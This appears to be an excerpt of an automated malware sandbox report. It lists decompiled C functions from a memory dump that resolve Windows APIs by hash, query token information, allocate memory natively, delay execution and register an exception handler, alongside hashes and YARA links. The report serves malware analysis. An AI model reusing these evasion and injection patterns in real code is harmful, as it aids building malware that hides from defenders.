0x709a0e37
0x709a0e3e
0x709a0e3e
0x709a0e39
0x709a0e39
0x709a0e3c
0x709a0e42
0x709a0e42
0x00000000
0x00000000
0x00000000
0x709a0e3c
0x709a0e44
0x709a0e46
0x709a0e4b
0x709a0e4b
0x00000000
0x709a0dcc
0x709a0dcc
0x709a0dcc
0x709a0dce
0x709a0dda
0x709a0ddf
0x709a0de1
0x00000000
0x00000000
0x709a0e2f
0x709a0e30
0x709a0e33
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x709a0e33
0x709a0de3
0x709a0de7
0x709a0dee
0x709a0def
0x709a0def
0x709a0dca
0x709a0db9
0x709a0d92
0x709a0d54
0x709a0913
0x709a0913
0x709a0913
0x709a0918
0x709a091e
0x709a091e
0x00000000
0x709a0918
0x709a090d
0x709a08ad
0x709a082b
0x709a082b
0x709a082c
0x709a082d
0x709a082d
0x709a0ceb
0x709a0ceb
0x709a0cf5
0x709a0cf5
0x00000000

APIs

GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,D0443458,D0443458), ref: 709A08FA
GetSystemInfo.KERNELBASE(?,4BCC7CBA,4BCC7CBA,?,?,F3453DD0,?,?,DB1D9B48,?,?,05411B30,00000000,80000002,00000000,-000000FC), ref: 709A0CBC
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,00000000,D0443458,D0443458,00000000,D0443458,D0443458), ref: 709A0D50

Memory Dump Source

Source File: 00000002.00000002.591905429.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true

Associated: 00000002.00000002.591883788.0000000070990000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591928200.00000000709AA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591939031.00000000709AD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.591965411.00000000709AF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken$InfoSystem
String ID:
API String ID: 298373132-0
Opcode ID: 44aec51210be057f98fdc20db7d2ac178e03d822167559629475ce117d95d373
Instruction ID: 26080f7cc8c105df41599afa1128653d57227b9a12a38372fe77d89e6a8ef4be
Opcode Fuzzy Hash: 44aec51210be057f98fdc20db7d2ac178e03d822167559629475ce117d95d373
Instruction Fuzzy Hash: 4422C2B0608345AEEB61DB34C951BAF77B9AFC5318F10891DF48A9B291EB30E845C753

Uniqueness

Uniqueness Score: -1.00%

Function 70991494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Download Yara Rule

C-Code - Quality: 31%

			E70991494(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v40;
				intOrPtr _v60;
				void* _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				void* _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				void* __ebp;
				void* _t282;
				intOrPtr* _t310;
				intOrPtr* _t318;
				intOrPtr* _t434;
				intOrPtr* _t480;
				void* _t481;

				_t481 = __eflags;
				_t480 =  &_v60;
				_v40 = __ecx;
				_v76 = 0;
				E7099F620( &_v72, 0);
				_v60 = 0x22dc1034;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x18], xmm0");
				E7099F8C4( &_v76, E7099F568( &_v76) + 0x10);
				E7099F558( &_v80, E7099F568( &_v80) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v88 = _v88 + 1;
				_t325 =  &_v84;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v84 + 0x10)) = 0x853cdd04;
				asm("movq [ecx+0x18], xmm0");
				E7099F8C4( &_v84, E7099F568(_t325) + 0x10);
				E7099F558( &_v88, E7099F568( &_v88) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v96 = _v96 + 1;
				_t329 =  &_v92;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v92 + 0x10)) = 0xb162dc4e;
				asm("movq [ecx+0x18], xmm0");
				E7099F8C4( &_v92, E7099F568(_t329) + 0x10);
				E7099F558( &_v96, E7099F568( &_v96) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v104 = _v104 + 1;
				_t333 =  &_v100;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v100 + 0x10)) = 0xc15ccc53;
				asm("movq [ecx+0x18], xmm0");
				E7099F8C4( &_v100, E7099F568(_t333) + 0x10);
				E7099F558( &_v104, E7099F568( &_v104) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v112 = _v112 + 1;
				_t337 =  &_v108;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v108 + 0x10)) = 0xc8fc2de6;
				asm("movq [ecx+0x18], xmm0");
				E7099F8C4( &_v108, E7099F568(_t337) + 0x10);
				E7099F558( &_v112, E7099F568( &_v112) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v120 = _v120 + 1;
				_t341 =  &_v116;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v116 + 0x10)) = 0x7d07f92f;
				asm("movq [ecx+0x18], xmm0");
				E7099F8C4( &_v116, E7099F568(_t341) + 0x10);
				E7099F558( &_v120, E7099F568( &_v120) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v128 = _v128 + 1;
				_t345 =  &_v124;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v124 + 0x10)) = 0xfc7fa539;
				asm("movq [ecx+0x18], xmm0");
				E7099F8C4( &_v124, E7099F568(_t345) + 0x10);
				E7099F558( &_v128, E7099F568( &_v128) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v136 = _v136 + 1;
				_t349 =  &_v132;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v132 + 0x10)) = 0x4145240a;
				asm("movq [ecx+0x18], xmm0");
				E7099F8C4( &_v132, E7099F568(_t349) + 0x10);
				E7099F558( &_v136, E7099F568( &_v136) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v144 = _v144 + 1;
				_t353 =  &_v140;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v140 + 0x10)) = 0x2c2324e8;
				asm("movq [ecx+0x18], xmm0");
				E7099F8C4( &_v140, E7099F568(_t353) + 0x10);
				E7099F558( &_v144, E7099F568( &_v144) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v152 = _v152 + 1;
				_t357 =  &_v148;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v148 + 0x10)) = 0xf06b4c6b;
				asm("movq [ecx+0x18], xmm0");
				E7099F8C4( &_v148, E7099F568(_t357) + 0x10);
				E7099F558( &_v152, E7099F568( &_v152) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v160 = _v160 + 1;
				_t361 =  &_v156;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v156 + 0x10)) = 0xa54975b2;
				asm("movq [ecx+0x18], xmm0");
				E7099F8C4( &_v156, E7099F568(_t361) + 0x10);
				E7099F558( &_v160, E7099F568( &_v160) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v168 = _v168 + 1;
				_t365 =  &_v164;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v164 + 0x10)) = 0x563e1998;
				asm("movq [ecx+0x18], xmm0");
				E7099F8C4( &_v164, E7099F568(_t365) + 0x10);
				E7099F558( &_v168, E7099F568( &_v168) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v176 = _v176 + 1;
				_t369 =  &_v172;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v172 + 0x10)) = 0xd926c223;
				asm("movq [ecx+0x18], xmm0");
				E7099F8C4( &_v172, E7099F568(_t369) + 0x10);
				E7099F558( &_v176, E7099F568( &_v176) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v184 = _v184 + 1;
				_t373 =  &_v180;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v180 + 0x10)) = 0x80febacc;
				asm("movq [ecx+0x18], xmm0");
				E7099F8C4( &_v180, E7099F568(_t373) + 0x10);
				E7099F558( &_v184, E7099F568( &_v184) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v192 = _v192 + 1;
				_t377 =  &_v188;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v188 + 0x10)) = 0x98595b64;
				asm("movq [ecx+0x18], xmm0");
				E7099F8C4( &_v188, E7099F568(_t377) + 0x10);
				E7099F558( &_v192, E7099F568( &_v192) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v200 = _v200 + 1;
				_t381 =  &_v196;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v196 + 0x10)) = 0x8e3b5f9c;
				asm("movq [ecx+0x18], xmm0");
				E7099F8C4( &_v196, E7099F568(_t381) + 0x10);
				E7099F558( &_v200, E7099F568( &_v200) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v208 = _v208 + 1;
				_t385 =  &_v204;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v204 + 0x10)) = 0x9b42cb07;
				asm("movq [ecx+0x18], xmm0");
				E7099F8C4( &_v204, E7099F568(_t385) + 0x10);
				E7099F558( &_v208, E7099F568( &_v208) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t434 = _t480;
				 *_t434 =  *_t434 + 1;
				E709A413C(0xa5eabdf8, _t434);
				E7099F558( &_v212, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x450], xmm0");
				E7099F558( &_v216, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x458], xmm0");
				E7099F558( &_v220, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x460], xmm0");
				E7099F558( &_v224, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x468], xmm0");
				E7099F558( &_v228, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x470], xmm0");
				E7099F558( &_v232, 0x60);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x478], xmm0");
				E7099F558( &_v236, 0x70);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x480], xmm0");
				E7099F558( &_v240, 0x80);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x488], xmm0");
				E7099F558( &_v244, 0x90);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x490], xmm0");
				E7099F558( &_v248, 0xa0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x498], xmm0");
				E7099F558( &_v252, 0xb0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a0], xmm0");
				E7099F558( &_v256, 0xc0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a8], xmm0");
				E7099F558( &_v260, 0xd0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b0], xmm0");
				E7099F558( &_v264, 0xe0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b8], xmm0");
				E7099F558( &_v268, 0xf0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c0], xmm0");
				E7099F558( &_v272, 0x100);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c8], xmm0");
				_t282 = E7099F558( &_v276, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp], xmm0");
				_v252 = E70991D2C(_v248, _t434, _t481, _t282, _t282);
				_t318 = _t434;
				E7099B338( &_v248, _v256, _t481, _v252, _t318);
				E7099F8DC( &_v296, _t481);
				_v300 = 0;
				_t410 =  &_v296;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v296 + 0x10)) = 0xfb42c037;
				asm("movq [ecx+0x18], xmm0");
				E7099F8C4( &_v296, E7099F568(_t410) + 0x10);
				E7099F558( &_v300, E7099F568( &_v300) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v308 = _v308 + 1;
				_t414 =  &_v304;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v304 + 0x10)) = 0x7082aaf3;
				asm("movq [ecx+0x18], xmm0");
				E7099F8C4( &_v304, E7099F568(_t414) + 0x10);
				E7099F558( &_v308, E7099F568( &_v308) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v316 = _v316 + 1;
				_t418 =  &_v312;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v312 + 0x10)) = 0x1eeb5e35;
				asm("movq [ecx+0x18], xmm0");
				E7099F8C4( &_v312, E7099F568(_t418) + 0x10);
				E7099F558( &_v316, E7099F568( &_v316) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v324 = _v324 + 1;
				_t422 =  &_v320;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v320 + 0x10)) = 0xe856fc47;
				asm("movq [ecx+0x18], xmm0");
				E7099F8C4( &_v320, E7099F568(_t422) + 0x10);
				E7099F558( &_v324, E7099F568( &_v324) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t480 =  *_t480 + 1;
				_t310 = _t480;
				_push(_t310);
				_push(_t318);
				_push(_v292);
				_t154 = _t310 + 0x2c; // 0x2c
				E7099BAB8(_t154,  *_t480);
				E7099F558( &_v340, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d8], xmm0"); // executed
				E7099F558( &_v344, 0x10); // executed
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e0], xmm0");
				E7099F558( &_v348, "true");
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d0], xmm0");
				E7099F558( &_v352, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e8], xmm0");
				E7099F6F0( &_v316);
				return E7099F6F0( &_v356);
			}

0x70991494
0x70991498
0x7099149d
0x709914a3
0x709914ab
0x709914b0
0x709914bc
0x709914c0
0x709914d2
0x709914e8
0x709914f3
0x709914f4
0x709914f5
0x709914f6
0x709914f7
0x709914fa
0x709914fe
0x70991502
0x70991509
0x7099151b
0x70991531
0x7099153c
0x7099153d
0x7099153e
0x7099153f
0x70991540
0x70991543
0x70991547
0x7099154b
0x70991552
0x70991564
0x7099157a
0x70991585
0x70991586
0x70991587
0x70991588
0x70991589
0x7099158c
0x70991590
0x70991594
0x7099159b
0x709915ad
0x709915c3
0x709915ce
0x709915cf
0x709915d0
0x709915d1
0x709915d2
0x709915d5
0x709915d9
0x709915dd
0x709915e4
0x709915f6
0x7099160c
0x70991617
0x70991618
0x70991619
0x7099161a
0x7099161b
0x7099161e
0x70991622
0x70991626
0x7099162d
0x7099163f
0x70991655
0x70991660
0x70991661
0x70991662
0x70991663
0x70991664
0x70991667
0x7099166b
0x7099166f
0x70991676
0x70991688
0x7099169e
0x709916a9
0x709916aa
0x709916ab
0x709916ac
0x709916ad
0x709916b0
0x709916b4
0x709916b8
0x709916bf
0x709916d1
0x709916e7
0x709916f2
0x709916f3
0x709916f4
0x709916f5
0x709916f6
0x709916f9
0x709916fd
0x70991701
0x70991708
0x7099171a
0x70991730
0x7099173b
0x7099173c
0x7099173d
0x7099173e
0x7099173f
0x70991742
0x70991746
0x7099174a
0x70991751
0x70991763
0x70991779
0x70991784
0x70991785
0x70991786
0x70991787
0x70991788
0x7099178b
0x7099178f
0x70991793
0x7099179a
0x709917ac
0x709917c2
0x709917cd
0x709917ce
0x709917cf
0x709917d0
0x709917d1
0x709917d4
0x709917d8
0x709917dc
0x709917e3
0x709917f5
0x7099180b
0x70991816
0x70991817
0x70991818
0x70991819
0x7099181a
0x7099181d
0x70991821
0x70991825
0x7099182c
0x7099183e
0x70991854
0x7099185f
0x70991860
0x70991861
0x70991862
0x70991863
0x70991866
0x7099186a
0x7099186e
0x70991875
0x70991887
0x7099189d
0x709918a8
0x709918a9
0x709918aa
0x709918ab
0x709918ac
0x709918af
0x709918b3
0x709918b7
0x709918be
0x709918d0
0x709918e6
0x709918f1
0x709918f2
0x709918f3
0x709918f4
0x709918f5
0x709918f8
0x709918fc
0x70991900
0x70991907
0x70991919
0x7099192f
0x7099193a
0x7099193b
0x7099193c
0x7099193d
0x7099193e
0x70991941
0x70991945
0x70991949
0x70991950
0x70991962
0x70991978
0x70991983
0x70991984
0x70991985
0x70991986
0x7099198c
0x7099198f
0x70991991
0x7099199c
0x709919a3
0x709919ac
0x709919b4
0x709919bb
0x709919c4
0x709919cc
0x709919d3
0x709919dc
0x709919e4
0x709919eb
0x709919f4
0x709919fc
0x70991a03
0x70991a0c
0x70991a14
0x70991a1b
0x70991a24
0x70991a2c
0x70991a36
0x70991a3f
0x70991a47
0x70991a51
0x70991a5a
0x70991a62
0x70991a6c
0x70991a75
0x70991a7d
0x70991a87
0x70991a90
0x70991a98
0x70991aa2
0x70991aab
0x70991ab3
0x70991abd
0x70991ac6
0x70991ace
0x70991ad8
0x70991ae1
0x70991ae9
0x70991af3
0x70991afc
0x70991b04
0x70991b0e
0x70991b17
0x70991b1f
0x70991b26
0x70991b2f
0x70991b37
0x70991b3e
0x70991b43
0x70991b51
0x70991b55
0x70991b64
0x70991b6d
0x70991b72
0x70991b79
0x70991b7d
0x70991b81
0x70991b88
0x70991b9a
0x70991bb0
0x70991bbb
0x70991bbc
0x70991bbd
0x70991bbe
0x70991bbf
0x70991bc2
0x70991bc6
0x70991bca
0x70991bd1
0x70991be3
0x70991bf9
0x70991c04
0x70991c05
0x70991c06
0x70991c07
0x70991c08
0x70991c0b
0x70991c0f
0x70991c13
0x70991c1a
0x70991c2c
0x70991c42
0x70991c4d
0x70991c4e
0x70991c4f
0x70991c50
0x70991c51
0x70991c54
0x70991c58
0x70991c5c
0x70991c63
0x70991c75
0x70991c8b
0x70991c96
0x70991c97
0x70991c98
0x70991c99
0x70991c9a
0x70991c9d
0x70991ca0
0x70991ca1
0x70991ca2
0x70991ca9
0x70991cac
0x70991cb7
0x70991cbe
0x70991cc7
0x70991ccf
0x70991cd6
0x70991cdf
0x70991ce7
0x70991cee
0x70991cf7
0x70991cff
0x70991d04
0x70991d0d
0x70991d15
0x70991d2a

Strings

$#,, xrefs: 70991701

Memory Dump Source

Source File: 00000002.00000002.591905429.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true

Associated: 00000002.00000002.591883788.0000000070990000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591928200.00000000709AA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591939031.00000000709AD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.591965411.00000000709AF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: $#,
API String ID: 0-2557146312
Opcode ID: faf8bf4f383b9672c02f2385df81a17d360748bba604cd6ce172ee8b62593912
Instruction ID: 0888e2dfde9465f7c0f4e23fd8ac9e93e90d3c03df6ca013f69f02ad6a2bc7c9
Opcode Fuzzy Hash: faf8bf4f383b9672c02f2385df81a17d360748bba604cd6ce172ee8b62593912
Instruction Fuzzy Hash: 4A329472414B059EC705DF20C862AAFF7B0AFE1209F11471DB4992A1A1FF71FA96C647

Uniqueness

Uniqueness Score: -1.00%

Function 709A218C, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E709A218C(void* __ecx, intOrPtr __edx, void* __esi) {
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr* _t5;
				intOrPtr _t11;
				intOrPtr* _t13;
				intOrPtr* _t15;

				_t11 = __edx;
				if(__ecx == 0) {
					 *_t15 = 0;
					_v4 = 0;
				} else {
					 *_t15 = E709A3A34(0xffffd8f0, 0xffffffff, __ecx, 0);
					_v20 = _t11;
				}
				_t5 = E709A2F94(0xa5eabdf8, 0xd48281c0, 0xa5eabdf8, 0xa5eabdf8);
				_t13 = _t5;
				if(_t13 != 0) {
					_t5 =  *_t13(0, _t15); // executed
				}
				return _t5;
			}

0x709a218c
0x709a2190
0x709a21ac
0x709a21af
0x709a2192
0x709a21a1
0x709a21a4
0x709a21a4
0x709a21bf
0x709a21c4
0x709a21c8
0x709a21d0
0x709a21d0
0x709a21d4

APIs

NtDelayExecution.NTDLL(00000000,00000000,A5EABDF8,A5EABDF8,FFFFFFFF,FFFFFFFF,709935C3,00000000,00000000,?), ref: 709A21D0

Memory Dump Source

Source File: 00000002.00000002.591905429.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true

Associated: 00000002.00000002.591883788.0000000070990000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591928200.00000000709AA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591939031.00000000709AD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.591965411.00000000709AF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: e340f986def6f26baa2f9c03e956c8e364c5e46def001a9482b730e7c6c19888
Instruction ID: 6eed4d8029ae59e1003f3a65b8252dde9810adc9b8d36d1cc224970ed9409f3d
Opcode Fuzzy Hash: e340f986def6f26baa2f9c03e956c8e364c5e46def001a9482b730e7c6c19888
Instruction Fuzzy Hash: 1BE09BF010E3116DEB44972C8D01B6F7AECDF80211F20851CB595F62C4EA30D800C723

Uniqueness

Uniqueness Score: -1.00%

Function 709A2790, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E709A2790(void* __ecx, long __edx, void* __esi, long _a4, long _a8, void* _a12) {
				long _v4;
				void* _t8;
				long _t10;
				PVOID* _t19;

				_v4 = __edx;
				 *_t19 = __ecx;
				if(E709A2F94(0xa5eabdf8, 0xc15ccc53, 0xa5eabdf8, 0xa5eabdf8) == 0) {
					L3:
					_t8 =  *_t19;
				} else {
					_t10 = NtAllocateVirtualMemory(_a12, _t19, 0,  &_v4, _a4, _a8); // executed
					if(_t10 == 0) {
						goto L3;
					} else {
						_t8 = 0;
					}
				}
				return _t8;
			}

0x709a2797
0x709a27a0
0x709a27ae
0x709a27d1
0x709a27d1
0x709a27b0
0x709a27c7
0x709a27cb
0x00000000
0x709a27cd
0x709a27cd
0x709a27cd
0x709a27cb
0x709a27d6

APIs

NtAllocateVirtualMemory.NTDLL(A5EABDF8,?,00000000,22DC1034,00000004,00000004,A5EABDF8,A5EABDF8,?,?,709A8852,00003000,00000004,000000FF,A5EABDF8,22DC1034), ref: 709A27C7

Memory Dump Source

Source File: 00000002.00000002.591905429.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true

Associated: 00000002.00000002.591883788.0000000070990000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591928200.00000000709AA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591939031.00000000709AD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.591965411.00000000709AF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: fcb83ea506db4d533a488a570b7e2b2bbaaaa8a6521a140e351edaccfb331de1
Instruction ID: 820c533dd434e381271db8805b555ac8179bcf89392cd0a825db1c78705d9827
Opcode Fuzzy Hash: fcb83ea506db4d533a488a570b7e2b2bbaaaa8a6521a140e351edaccfb331de1
Instruction Fuzzy Hash: 16E01CB120D342AFDB09CA28CC15EAFB7EDEF88200F108C1DB49596550D760E940DB62

Uniqueness

Uniqueness Score: -1.00%

Function 709A3060, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E709A3060(intOrPtr* __ecx) {
				void* _t1;

				_push(E709A33D8);
				_push(1); // executed
				_t1 =  *__ecx(); // executed
				return _t1;
			}

0x709a3060
0x709a3065
0x709a3067
0x709a3069

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,709A33D8,709A3050,A5EABDF8,A5EABDF8,?,70992530,00000001), ref: 709A3067

Memory Dump Source

Source File: 00000002.00000002.591905429.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true

Associated: 00000002.00000002.591883788.0000000070990000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591928200.00000000709AA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591939031.00000000709AD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.591965411.00000000709AF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: 43df1f0ff5033994842245da45e9eec94f4cf60cda0ae9b46f1817df24036234
Instruction ID: 13568b3ee00bb3156a5aeb9807f231a43ef669e41cad03f30bbbbf417fd74661
Opcode Fuzzy Hash: 43df1f0ff5033994842245da45e9eec94f4cf60cda0ae9b46f1817df24036234
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 709A1140, Relevance: 3.1, APIs: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E709A1140(void* __ecx, void* __edi, void* __esi) {
				long _v12;
				void* _v20;
				void* _v24;
				char _v32;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				void* _v64;
				int _t31;
				void* _t33;
				long* _t39;
				intOrPtr* _t46;
				void* _t54;
				void* _t56;
				void* _t58;
				long* _t59;

				_t59 = _t58 - 0x20;
				_t56 = __ecx;
				_v12 = 0;
				_t46 = E709A2F94(0xd0443458, 0xd8ece5ad, 0xd0443458, 0xd0443458);
				if(_t46 != 0) {
					 *_t46(_t56, 8,  &_v12);
				}
				_t39 = _t59;
				 *_t39 = _v12;
				_t39[1] = 1;
				if(E7099C33C(_t39) != 0) {
					L6:
					if(_t59[1] != 0) {
						E7099BC00(_t59);
					}
					return 0;
				} else {
					_t59[6] = 0;
					if(E709A2F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458) != 0) {
						GetTokenInformation(_v40, 0x19, 0, 0,  &(_t59[6])); // executed
					}
					_t24 = _t59[6];
					if(_t59[6] != 0) {
						E7099F620( &_v32, _t24);
						_t54 = E7099F558( &(_t59[3]), 0);
						if(E709A2F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458) == 0) {
							L14:
							E7099F6F0( &_v32);
							goto L6;
						} else {
							_t31 = GetTokenInformation(_v40, 0x19, _t54, _t59[7],  &(_t59[6])); // executed
							if(_t31 == 0) {
								goto L14;
							} else {
								_t33 = E709A2F94(0xd0443458, 0x57bf3274, 0xd0443458, 0xd0443458);
								if(_t33 == 0) {
									goto L14;
								} else {
									_push( *_t54);
									asm("int3");
									return _t33;
								}
							}
						}
					} else {
						goto L6;
					}
				}
			}

0x709a1142
0x709a114f
0x709a1151
0x709a1160
0x709a1164
0x709a116e
0x709a116e
0x709a1174
0x709a1177
0x709a1179
0x709a1184
0x709a11be
0x709a11c3
0x709a11c8
0x709a11c8
0x709a11d4
0x709a1186
0x709a1190
0x709a11a3
0x709a11b4
0x709a11b4
0x709a11b6
0x709a11bc
0x709a11da
0x709a11ea
0x709a1201
0x709a12e3
0x709a12e7
0x00000000
0x709a1207
0x709a1217
0x709a121b
0x00000000
0x709a1221
0x709a122d
0x709a1234
0x00000000
0x709a123a
0x709a123a
0x709a123c
0x709a123d
0x709a123d
0x709a1234
0x709a121b
0x00000000
0x00000000
0x00000000
0x709a11bc

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,D0443458,D0443458,D0443458,D0443458), ref: 709A11B4
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,D0443458,D0443458,00000000,00000000,D0443458,D0443458,D0443458,D0443458), ref: 709A1217

Memory Dump Source

Source File: 00000002.00000002.591905429.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true

Associated: 00000002.00000002.591883788.0000000070990000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591928200.00000000709AA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591939031.00000000709AD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.591965411.00000000709AF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
